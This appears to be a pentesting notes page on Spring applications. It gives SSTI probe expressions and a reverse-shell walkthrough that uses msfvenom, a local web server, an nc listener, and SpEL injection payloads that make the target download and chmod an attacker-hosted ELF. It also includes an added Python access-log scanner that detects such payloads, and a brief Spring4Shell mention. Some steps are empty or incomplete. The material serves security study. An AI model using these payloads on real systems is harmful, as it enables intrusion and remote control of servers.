Exploit Notes

Spring Pentesting

Last modified: 2023-01-23


Spring is an application framework and inversion of control container for the Java platform.


  • If we get the Whitelabel Error Page, the website uses Spring Boot.

Reverse Shell with SSTI

SSTI Discovery

If an input form (such as a search form) or a URL parameter is reflected in the page, the website may be vulnerable to server-side template injection (SSTI).

Try them:


Then you can check further with expressions like these:

{"dfd".replace("d", "x")}
#{"dfd".replace("d", "x")}
*{"dfd".replace("d", "x")}

// ---------------------------------------

// the desired output of the above...

Reverse Shell

First, generate the reverse shell payload, which the target website will download.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f elf > r.elf

Start a local web server so that the website can download the payload named “r.elf”.

python3 -m http.server 8000

In another terminal, open a listener to receive the reverse shell.

nc -lvnp <local-port>

On the target website:

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("wget http://<local-ip>:8000/r.elf")}

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("chmod 777 ./r.elf")}


Finally, we should get the shell.
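
From the defending side, the probes and payloads above leave recognisable traces in web access logs. The following is an added example, not part of the original notes: it URL-decodes each request target and flags template expressions and reflection-based Runtime access. The rule names, regexes and log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rules are assumptions for this example, modelled on the payload shapes on this page.
RULES = {
    # optional $, * or # prefix, then braces wrapping a method call: *{"dfd".replace(...)}
    "expression-probe": re.compile(r'[$*#]?\{[^{}]*\.\s*\w+\s*\([^{}]*\}'),
    # reflection used to reach classes a template should never touch
    "reflection": re.compile(r'getClass\s*\(|forName\s*\(|java\.lang\.Runtime', re.I),
    # command execution through Runtime
    "runtime-exec": re.compile(r'getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(', re.I),
}
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def decode(target, max_rounds=3):
    """URL-decode repeatedly so double-encoded payloads are normalised too."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target

def scan(lines):
    """Return (line_number, severity, matched_rules) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = decode(match.group(1))
        hits = sorted(name for name, rule in RULES.items() if rule.search(target))
        if hits:
            severity = "high" if "runtime-exec" in hits else "medium"
            findings.append((number, severity, hits))
    return findings

# Constructed access-log lines (documentation IP ranges, placeholder command).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Jan/2023:10:00:01 +0000] "GET /search?q=spring+boot HTTP/1.1" 200 512',
    '198.51.100.7 - - [23/Jan/2023:10:00:05 +0000] "GET /search?q=*%7B%22dfd%22.replace(%22d%22%2C%22x%22)%7D HTTP/1.1" 200 498',
    '198.51.100.7 - - [23/Jan/2023:10:00:09 +0000] "GET /search?q=*%7B%22%22.getClass().forName(%22java.lang.Runtime%22).getRuntime().exec(%22%3Ccmd%3E%22)%7D HTTP/1.1" 500 120',
    '198.51.100.7 - - [23/Jan/2023:10:00:12 +0000] "GET /search?q=%2523%257B%2522dfd%2522.replace(%2522d%2522%252C%2522x%2522)%257D HTTP/1.1" 200 498',
    '192.0.2.11 - - [23/Jan/2023:10:00:15 +0000] "GET /api/items?filter=%7B%22name%22%3A%22a.b%22%7D HTTP/1.1" 200 230',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The expression rule requires a method call inside the braces, so plain JSON in a query string (the last sample line) is not flagged.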

Spring4Shell (CVE-2022-22965)

Spring4Shell is a remote code execution vulnerability in the Spring Framework. It affects a component in Spring Core, which is the heart of the framework.

It is identified as a bypass of the patch for CVE-2010-1622.


Various exploits are available in GitHub repositories.
